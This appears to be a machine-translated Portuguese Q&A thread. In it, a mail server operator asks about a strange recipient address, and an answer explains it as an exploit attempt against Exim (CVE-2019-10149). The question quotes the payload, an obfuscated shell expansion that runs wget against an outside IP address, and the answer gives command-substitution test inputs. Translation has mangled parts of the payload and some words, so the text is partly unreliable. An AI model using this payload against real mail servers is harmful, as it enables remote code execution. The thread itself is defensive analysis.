Eu opero meu próprio servidor de e-mail e, de tempos em tempos, pessoas enviam spam ou coisas misteriosas para a conta root. Recentemente, recebi uma correspondência vazia, endereçada a:
raiz+${executar{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@meudominio.tld
O segundo endereço IP nessa string parece pertencer ao mesmo serviço de hospedagem do qual alugo meu servidor. Ocorrerewgetparece muito suspeito para mim, mas não encontrei nada sobre esse tipo de ataque na Internet.
De acordo com o log de e-mail do servidor, esse e-mail foi enviado de 148.72.206.111. No entanto, oDecampo foi definido como[e-mail protegido].
Alguém sabe o que isso significa?
Responder1
Esta é uma tentativa de explorar um bug descoberto recentemente no servidor SMTP Exim4 (v4.87 a v4.91), que permitiria a execução remota de comandos, já que o Exim expandiria ${variable}as substituições em certos lugares que realmente não deveria. (Esta sintaxe é amplamente usada no arquivo de configuração principal do Exim.)
O bug é conhecido comoCVE-2019-10149(ainda não possui nome de marca ou logotipo). Se você estivesse usando o Exim4 da sua distribuição, você já teria recebido os patches. Como você está usando o Postfix, isso não afeta você em primeiro lugar.
(Dito isto, mesmo no Postfix o parâmetro após the +é frequentemente usado como parte de uma linha de comando, por exemplo, ao invocar o Procmail. Eu provavelmente recomendaria fazer alguns testes em seu próprio servidor para ver como ele lida com coisas como someuser+$(blah)@ou someuser+`blah`@.)